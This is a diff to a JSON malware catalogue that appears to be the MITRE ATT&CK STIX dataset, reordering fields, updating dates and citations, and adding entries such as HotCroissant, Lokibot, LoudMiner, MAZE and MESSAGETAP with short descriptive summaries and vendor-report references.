@@ -194822,10 +223640,10 @@
],
"modified": "2020-03-30T16:48:12.607Z",
"created": "2017-05-31T21:32:35.389Z",
- "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Hacking Team UEFI Rootkit"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--eff1a885-6f90-42a1-901f-eef6e7a1905e",
@@ -194857,16 +223675,16 @@
],
"modified": "2020-03-28T21:35:13.610Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Helminth"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Robert Falcone"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "Helminth"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--5967cc93-57c9-404a-8ffd-097edfa7bdfc",
@@ -194882,7 +223700,7 @@
{
"source_name": "Fidelis Hi-Zor",
"description": "Fidelis Threat Research Team. (2016, January 27). Introducing Hi-Zor RAT. Retrieved March 24, 2016.",
- "url": "http://www.threatgeek.com/2016/01/introducing-hi-zor-rat.html"
+ "url": "https://www.fidelissecurity.com/threatgeek/archive/introducing-hi-zor-rat/"
}
],
"object_marking_refs": [
@@ -194892,17 +223710,23 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T16:48:50.331Z",
+ "modified": "2020-05-13T22:56:22.295Z",
"created": "2017-05-31T21:32:56.860Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Hi-Zor"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
+ "created": "2019-06-24T12:04:32.323Z",
+ "modified": "2020-03-26T20:35:27.505Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
"external_references": [
{
"external_id": "S0394",
@@ -194926,25 +223750,19 @@
"description": "[HiddenWasp](https://attack.mitre.org/software/S0394) is a Linux-based Trojan used to target systems for remote control. It comes in the form of a statistically linked ELF binary with stdlibc++.(Citation: Intezer HiddenWasp Map 2019)",
"name": "HiddenWasp",
"id": "malware--fc774af4-533b-4724-96d2-ac1026316794",
- "type": "malware",
- "labels": [
- "malware"
- ],
- "modified": "2020-03-26T20:35:27.505Z",
- "created": "2019-06-24T12:04:32.323Z",
- "x_mitre_platforms": [
- "Linux"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"HiddenWasp"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Linux"
+ ]
},
{
"id": "malware--95047f03-4811-4300-922e-1ba937d53a61",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"name": "Hikit",
- "description": "[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise. (Citation: Novetta-Axiom)",
+ "description": "[Hikit](https://attack.mitre.org/software/S0009) is malware that has been used by [Axiom](https://attack.mitre.org/groups/G0001) for late-stage persistence and exfiltration after the initial compromise. (Citation: Novetta-Axiom) (Citation: FireEye Hikit Rootkit)",
"external_references": [
{
"source_name": "mitre-attack",
@@ -194952,9 +223770,14 @@
"external_id": "S0009"
},
{
- "source_name": "Novetta-Axiom",
+ "url": "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf",
"description": "Novetta. (n.d.). Operation SMN: Axiom Threat Actor Group Report. Retrieved November 12, 2014.",
- "url": "http://www.novetta.com/wp-content/uploads/2014/11/Executive_Summary-Final_1.pdf"
+ "source_name": "Novetta-Axiom"
+ },
+ {
+ "url": "https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html",
+ "description": "Glyer, C., Kazanciyan, R. (2012, August 20). The \u201cHikit\u201d Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016.",
+ "source_name": "FireEye Hikit Rootkit"
}
],
"object_marking_refs": [
@@ -194964,15 +223787,57 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T16:49:30.272Z",
+ "modified": "2020-05-13T20:37:29.986Z",
"created": "2017-05-31T21:32:14.124Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Hikit"
+ "x_mitre_contributors": [
+ "Christopher Glyer, FireEye, @cglyer"
],
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Hikit"
+ ],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "created": "2020-05-01T19:10:31.446Z",
+ "modified": "2020-05-06T19:28:21.746Z",
+ "labels": [
+ "malware"
+ ],
+ "type": "malware",
+ "id": "malware--aad11e34-02ca-4220-91cd-2ed420af4db3",
+ "description": "[HotCroissant](https://attack.mitre.org/software/S0431) is a remote access trojan (RAT) attributed by U.S. government entities to malicious North Korean government cyber activity, tracked collectively as HIDDEN COBRA.(Citation: US-CERT HOTCROISSANT February 2020) [HotCroissant](https://attack.mitre.org/software/S0431) shares numerous code similarities with [Rifdoor](https://attack.mitre.org/software/S0433).(Citation: Carbon Black HotCroissant April 2020)",
+ "name": "HotCroissant",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0431",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0431"
+ },
+ {
+ "source_name": "US-CERT HOTCROISSANT February 2020",
+ "url": "https://www.us-cert.gov/ncas/analysis-reports/ar20-045d",
+ "description": "US-CERT. (2020, February 20). MAR-10271944-1.v1 \u2013 North Korean Trojan: HOTCROISSANT. Retrieved May 1, 2020."
+ },
+ {
+ "source_name": "Carbon Black HotCroissant April 2020",
+ "url": "https://www.carbonblack.com/2020/04/16/vmware-carbon-black-tau-threat-analysis-the-evolution-of-lazarus/",
+ "description": "Knight, S.. (2020, April 16). VMware Carbon Black TAU Threat Analysis: The Evolution of Lazarus. Retrieved May 1, 2020."
+ }
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ],
+ "x_mitre_aliases": [
+ "HotCroissant"
+ ],
+ "x_mitre_version": "1.0"
},
{
"id": "malware--73a4793a-ce55-4159-b2a6-208ef29b326f",
@@ -195047,15 +223912,15 @@
],
"modified": "2020-03-30T16:50:01.217Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Hydraq",
"Aurora",
"9002 RAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -195069,19 +223934,19 @@
"description": "(Citation: Unit42 Emissary Panda May 2019)"
},
{
- "source_name": "Unit42 Emissary Panda May 2019",
+ "description": "Falcone, R. and Lancaster, T.. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019.",
"url": "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/",
- "description": "Falcone, R. and Lancaster, T.. (2019, May 28). Emissary Panda Attacks Middle East Government Sharepoint Servers. Retrieved July 9, 2019."
+ "source_name": "Unit42 Emissary Panda May 2019"
},
{
- "url": "https://securelist.com/luckymouse-hits-national-data-center/86083/",
+ "source_name": "Securelist LuckyMouse June 2018",
"description": "Legezo, D. (2018, June 13). LuckyMouse hits national data center to organize country-level waterholing campaign. Retrieved August 18, 2018.",
- "source_name": "Securelist LuckyMouse June 2018"
+ "url": "https://securelist.com/luckymouse-hits-national-data-center/86083/"
},
{
- "url": "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html",
+ "source_name": "Hacker News LuckyMouse June 2018",
"description": "Khandelwal, S. (2018, June 14). Chinese Hackers Carried Out Country-Level Watering Hole Attack. Retrieved August 18, 2018.",
- "source_name": "Hacker News LuckyMouse June 2018"
+ "url": "https://thehackernews.com/2018/06/chinese-watering-hole-attack.html"
}
],
"object_marking_refs": [
@@ -195095,15 +223960,15 @@
"labels": [
"malware"
],
- "modified": "2020-03-30T16:50:29.655Z",
+ "modified": "2020-06-23T00:20:31.733Z",
"created": "2019-07-09T17:42:44.777Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"HyperBro"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
},
{
"id": "malware--5be33fef-39c0-4532-84ee-bea31e1b5324",
@@ -195135,16 +224000,16 @@
],
"modified": "2020-03-31T12:38:41.115Z",
"created": "2018-01-16T16:13:52.465Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "ISMInjector"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Robert Falcone"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "ISMInjector"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--c8b6cc43-ce61-42ae-87f3-a5f10526f952",
@@ -195176,13 +224041,13 @@
],
"modified": "2020-03-20T02:21:24.856Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"InnaputRAT"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--47afe41c-4c08-485e-b062-c3bd209a1cce",
@@ -195214,13 +224079,13 @@
],
"modified": "2020-03-30T02:19:18.750Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"InvisiMole"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--8beac7c2-48d2-4cd9-9b15-6c452f38ac06",
@@ -195248,13 +224113,13 @@
],
"modified": "2020-03-20T22:45:06.494Z",
"created": "2017-05-31T21:32:16.360Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Ixeshe"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.2"
},
{
"id": "malware--aaf3fa65-8b27-4e68-91de-2b7738fe4c82",
@@ -195286,10 +224151,10 @@
],
"modified": "2020-03-30T16:51:27.312Z",
"created": "2019-06-18T17:20:43.635Z",
- "x_mitre_version": "1.1",
"x_mitre_aliases": [
"JCry"
- ]
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--8ae43c46-57ef-47d5-a77a-eebb35628db2",
@@ -195375,7 +224240,9 @@
],
"modified": "2020-03-30T16:51:56.323Z",
"created": "2017-05-31T21:32:34.199Z",
- "x_mitre_version": "2.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"JHUHUGIT",
"Trojan.Sofacy",
@@ -195385,9 +224252,7 @@
"GAMEFISH",
"SofacyCarberp"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "2.1"
},
{
"id": "malware--de6cb631-52f6-4169-a73b-7965390b0c30",
@@ -195419,16 +224284,16 @@
],
"modified": "2020-03-20T02:18:03.707Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "JPIN"
+ "x_mitre_platforms": [
+ "Windows"
],
"x_mitre_contributors": [
"Ryan Becwar"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_aliases": [
+ "JPIN"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--234e7770-99b0-4f65-b983-d3230f76a60b",
@@ -195455,13 +224320,13 @@
],
"modified": "2020-03-19T18:00:00.645Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "macOS"
+ ],
"x_mitre_aliases": [
"Janicab"
],
- "x_mitre_platforms": [
- "macOS"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--3c02fb1f-cbdb-48f5-abaf-8c81d6e0c322",
@@ -195493,13 +224358,13 @@
],
"modified": "2020-03-30T16:52:22.775Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"KARAE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--11e36d5b-6a92-4bf9-8eb7-85eb24f59e22",
@@ -195531,13 +224396,13 @@
],
"modified": "2020-03-30T16:53:14.872Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"KEYMARBLE"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--7dbb67c7-270a-40ad-836e-c45f8948aa5a",
@@ -195569,18 +224434,18 @@
],
"modified": "2020-03-30T16:53:45.307Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"KOMPROGO"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--86b92f6c-9c05-4c51-b361-4c7bb13e21a1",
"name": "KONNI",
- "description": "[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)",
+ "description": "[KONNI](https://attack.mitre.org/software/S0356) is a Windows remote administration too that has been seen in use since 2014 and evolved in its capabilities through at least 2017. [KONNI](https://attack.mitre.org/software/S0356) has been linked to several campaigns involving North Korean themes.(Citation: Talos Konni May 2017) [KONNI](https://attack.mitre.org/software/S0356) has significant code overlap with the [NOKKI](https://attack.mitre.org/software/S0353) malware family. There is some evidence potentially linking [KONNI](https://attack.mitre.org/software/S0356) to [APT37](https://attack.mitre.org/groups/G0067).(Citation: Unit 42 NOKKI Sept 2018)(Citation: Unit 42 Nokki Oct 2018)(Citation: Medium KONNI Jan 2020)",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
@@ -195601,29 +224466,34 @@
"description": "Rascagneres, P. (2017, May 03). KONNI: A Malware Under The Radar For Years. Retrieved November 5, 2018."
},
{
- "description": "Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018.",
+ "source_name": "Unit 42 NOKKI Sept 2018",
"url": "https://researchcenter.paloaltonetworks.com/2018/09/unit42-new-konni-malware-attacking-eurasia-southeast-asia/",
- "source_name": "Unit 42 NOKKI Sept 2018"
+ "description": "Grunzweig, J., Lee, B. (2018, September 27). New KONNI Malware attacking Eurasia and Southeast Asia. Retrieved November 5, 2018."
},
{
- "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018.",
+ "source_name": "Unit 42 Nokki Oct 2018",
"url": "https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/",
- "source_name": "Unit 42 Nokki Oct 2018"
+ "description": "Grunzweig, J. (2018, October 01). NOKKI Almost Ties the Knot with DOGCALL: Reaper Group Uses New Malware to Deploy RAT. Retrieved November 5, 2018."
+ },
+ {
+ "source_name": "Medium KONNI Jan 2020",
+ "url": "https://medium.com/d-hunter/a-look-into-konni-2019-campaign-b45a0f321e9b",
+ "description": "Karmi, D. (2020, January 4). A Look Into Konni 2019 Campaign. Retrieved April 28, 2020."
}
],
"type": "malware",
"labels": [
"malware"
],
- "modified": "2020-03-20T02:11:56.423Z",
+ "modified": "2020-04-28T18:32:51.846Z",
"created": "2019-01-31T00:36:39.771Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"KONNI"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.3"
},
{
"id": "malware--26fed817-e7bf-41f9-829a-9075ffac45c2",
@@ -195651,13 +224521,13 @@
],
"modified": "2020-03-30T16:54:23.238Z",
"created": "2017-05-31T21:32:57.344Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Kasidet"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--536be338-e2ef-4a6b-afb6-8d5568b91eb2",
@@ -195689,14 +224559,14 @@
],
"modified": "2020-03-20T21:15:48.610Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.2",
- "x_mitre_aliases": [
- "Kazuar"
- ],
"x_mitre_platforms": [
"Windows",
"macOS"
- ]
+ ],
+ "x_mitre_aliases": [
+ "Kazuar"
+ ],
+ "x_mitre_version": "1.2"
},
{
"id": "malware--5dd649c0-bca4-488b-bd85-b180474ec62e",
@@ -195738,15 +224608,15 @@
],
"modified": "2020-03-27T20:55:47.638Z",
"created": "2019-06-14T16:45:33.729Z",
- "x_mitre_contributors": [
- "Bart Parys"
+ "x_mitre_platforms": [
+ "Windows"
],
- "x_mitre_version": "1.2",
"x_mitre_aliases": [
"KeyBoy"
],
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_version": "1.2",
+ "x_mitre_contributors": [
+ "Bart Parys"
]
},
{
@@ -195788,13 +224658,47 @@
],
"modified": "2020-03-30T16:55:01.985Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "macOS"
+ ],
"x_mitre_aliases": [
"Keydnap",
"OSX/Keydnap"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0437",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0437"
+ },
+ {
+ "source_name": "TrendMicro BlackTech June 2017",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/",
+ "description": "Bermejo, L., et al. (2017, June 22). Following the Trail of BlackTech\u2019s Cyber Espionage Campaigns. Retrieved May 5, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Kivars",
+ "description": "[Kivars](https://attack.mitre.org/software/S0437) is a modular remote access tool (RAT), derived from the Bifrost RAT, that was used by [BlackTech](https://attack.mitre.org/groups/G0098) in a 2010 campaign.(Citation: TrendMicro BlackTech June 2017)",
+ "id": "malware--b2d134a1-7bd5-4293-94d4-8fc978cb1cd7",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-03T20:19:34.935Z",
+ "created": "2020-05-06T18:10:59.143Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Kivars"
+ ],
"x_mitre_platforms": [
- "macOS"
+ "Windows"
]
},
{
@@ -195828,13 +224732,13 @@
],
"modified": "2020-03-30T16:55:54.637Z",
"created": "2017-12-14T16:46:06.044Z",
- "x_mitre_platforms": [
- "macOS"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"Komplex"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "macOS"
+ ]
},
{
"id": "malware--c2417bab-3189-4d4d-9d60-96de2cdaf0ab",
@@ -195866,16 +224770,16 @@
],
"modified": "2020-03-18T22:06:42.386Z",
"created": "2018-10-17T00:14:20.652Z",
- "x_mitre_version": "1.1",
- "x_mitre_aliases": [
- "Kwampirs"
+ "x_mitre_contributors": [
+ "Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre"
],
"x_mitre_platforms": [
"Windows"
],
- "x_mitre_contributors": [
- "Elger Vinicius S. Rodrigues, @elgervinicius, CYBINT Centre"
- ]
+ "x_mitre_aliases": [
+ "Kwampirs"
+ ],
+ "x_mitre_version": "1.1"
},
{
"id": "malware--2a6f4c7b-e690-4cc7-ab6b-1f821fb6b80b",
@@ -195903,13 +224807,13 @@
],
"modified": "2020-03-30T16:56:27.375Z",
"created": "2017-05-31T21:32:33.348Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"LOWBALL"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"external_references": [
@@ -195937,14 +224841,14 @@
],
"modified": "2020-03-30T02:59:20.670Z",
"created": "2019-06-28T13:09:26.710Z",
- "x_mitre_platforms": [
- "Windows",
- "Linux"
- ],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"LightNeuron"
],
- "x_mitre_version": "1.1"
+ "x_mitre_platforms": [
+ "Windows",
+ "Linux"
+ ]
},
{
"id": "malware--e9e9bfe2-76f4-4870-a2a1-b7af89808613",
@@ -195981,13 +224885,13 @@
],
"modified": "2020-03-30T16:57:00.081Z",
"created": "2018-04-18T17:59:24.739Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Linfo"
],
- "x_mitre_platforms": [
- "Windows"
- ]
+ "x_mitre_version": "1.1"
},
{
"id": "malware--0efefea5-78da-4022-92bc-d726139e8883",
@@ -196019,13 +224923,13 @@
],
"modified": "2020-03-30T16:57:31.004Z",
"created": "2019-03-04T17:12:37.586Z",
- "x_mitre_version": "1.2",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
"x_mitre_aliases": [
"Linux Rabbit"
],
- "x_mitre_platforms": [
- "Linux"
- ]
+ "x_mitre_version": "1.2"
},
{
"external_references": [
@@ -196057,15 +224961,15 @@
],
"modified": "2020-03-30T16:57:58.594Z",
"created": "2019-07-02T12:58:09.598Z",
- "x_mitre_platforms": [
- "Windows"
+ "x_mitre_contributors": [
+ "Jean-Ian Boutin, ESET"
],
+ "x_mitre_version": "1.1",
"x_mitre_aliases": [
"LoJax"
],
- "x_mitre_version": "1.1",
- "x_mitre_contributors": [
- "Jean-Ian Boutin, ESET"
+ "x_mitre_platforms": [
+ "Windows"
]
},
{
@@ -196099,13 +225003,87 @@
],
"modified": "2020-03-20T18:56:22.049Z",
"created": "2019-04-16T19:00:49.435Z",
- "x_mitre_platforms": [
- "Windows"
- ],
+ "x_mitre_version": "1.3",
"x_mitre_aliases": [
"LockerGoga"
],
- "x_mitre_version": "1.3"
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0447",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0447"
+ },
+ {
+ "source_name": "Infoblox Lokibot January 2019",
+ "url": "https://insights.infoblox.com/threat-intelligence-reports/threat-intelligence--22",
+ "description": "Hoang, M. (2019, January 31). Malicious Activity Report: Elements of Lokibot Infostealer. Retrieved May 15, 2020."
+ },
+ {
+ "source_name": "Morphisec Lokibot April 2020",
+ "url": "https://blog.morphisec.com/lokibot-with-autoit-obfuscator-frenchy-shellcode",
+ "description": "Cheruku, H. (2020, April 15). LOKIBOT WITH AUTOIT OBFUSCATOR + FRENCHY SHELLCODE. Retrieved May 14, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "name": "Lokibot",
+ "description": "[Lokibot](https://attack.mitre.org/software/S0447) is a malware designed to collect credentials and security tokens from an infected machine. [Lokibot](https://attack.mitre.org/software/S0447) has also been used to establish backdoors in enterprise environments.(Citation: Infoblox Lokibot January 2019)(Citation: Morphisec Lokibot April 2020)",
+ "id": "malware--cb741463-f0fe-42e0-8d45-bc7e8335f5ae",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-05-18T22:00:40.499Z",
+ "created": "2020-05-14T17:31:33.707Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "Lokibot"
+ ],
+ "x_mitre_platforms": [
+ "Windows"
+ ]
+ },
+ {
+ "external_references": [
+ {
+ "external_id": "S0451",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0451"
+ },
+ {
+ "source_name": "ESET LoudMiner June 2019",
+ "url": "https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/",
+ "description": "Malik, M. (2019, June 20). LoudMiner: Cross-platform mining in cracked VST software. Retrieved May 18, 2020."
+ }
+ ],
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "description": "[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)",
+ "name": "LoudMiner",
+ "id": "malware--f99f3dcc-683f-4936-8791-075ac5e58f10",
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-29T23:17:50.246Z",
+ "created": "2020-05-18T21:01:51.045Z",
+ "x_mitre_version": "1.0",
+ "x_mitre_aliases": [
+ "LoudMiner"
+ ],
+ "x_mitre_platforms": [
+ "macOS",
+ "Windows"
+ ]
},
{
"id": "malware--251fbae2-78f6-4de7-84f6-194c727a64ad",
@@ -196138,14 +225116,87 @@
],
"modified": "2020-03-31T12:39:16.608Z",
"created": "2017-05-31T21:32:14.527Z",
- "x_mitre_version": "1.1",
+ "x_mitre_platforms": [
+ "Windows"
+ ],
"x_mitre_aliases": [
"Lurid",
"Enfal"
],
+ "x_mitre_version": "1.1"
+ },
+ {
+ "id": "malware--d9f7383c-95ec-4080-bbce-121c9384457b",
+ "description": "[MAZE](https://attack.mitre.org/software/S0449) ransomware, previously known as \"ChaCha\", was discovered in May 2019. In addition to encrypting files on victim machines for impact, [MAZE](https://attack.mitre.org/software/S0449) operators conduct information stealing campaigns prior to encryption and post the information online to extort affected companies.(Citation: FireEye Maze May 2020)(Citation: McAfee Maze March 2020)",
+ "name": "MAZE",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0449",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0449"
+ },
+ {
+ "source_name": "FireEye Maze May 2020",
+ "url": "https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html",
+ "description": "Kennelly, J., Goody, K., Shilko, J. (2020, May 7). Navigating the MAZE: Tactics, Techniques and Procedures Associated With MAZE Ransomware Incidents. Retrieved May 18, 2020."
+ },
+ {
+ "source_name": "McAfee Maze March 2020",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/ransomware-maze/",
+ "description": "Mundo, A. (2020, March 26). Ransomware Maze. Retrieved May 18, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T01:40:07.349Z",
+ "created": "2020-05-18T16:17:59.464Z",
"x_mitre_platforms": [
"Windows"
- ]
+ ],
+ "x_mitre_aliases": [
+ "MAZE"
+ ],
+ "x_mitre_version": "1.0"
+ },
+ {
+ "id": "malware--9b19d6b4-cfcb-492f-8ca8-8449e7331573",
+ "name": "MESSAGETAP",
+ "description": "[MESSAGETAP](https://attack.mitre.org/software/S0443) is a data mining malware family deployed by [APT41](https://attack.mitre.org/groups/G0096) into telecommunications networks to monitor and save SMS traffic from specific phone numbers, IMSI numbers, or that contain specific keywords. (Citation: FireEye MESSAGETAP October 2019)",
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "external_references": [
+ {
+ "external_id": "S0443",
+ "source_name": "mitre-attack",
+ "url": "https://attack.mitre.org/software/S0443"
+ },
+ {
+ "source_name": "FireEye MESSAGETAP October 2019",
+ "url": "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html",
+ "description": "Leong, R., Perez, D., Dean, T. (2019, October 31). MESSAGETAP: Who\u2019s Reading Your Text Messages?. Retrieved May 11, 2020."
+ }
+ ],
+ "type": "malware",
+ "labels": [
+ "malware"
+ ],
+ "modified": "2020-06-24T01:43:11.282Z",
+ "created": "2020-05-11T21:41:19.008Z",
+ "x_mitre_platforms": [
+ "Linux"
+ ],
+ "x_mitre_aliases": [
+ "MESSAGETAP"
+ ],
+ "x_mitre_version": "1.0"
},
{
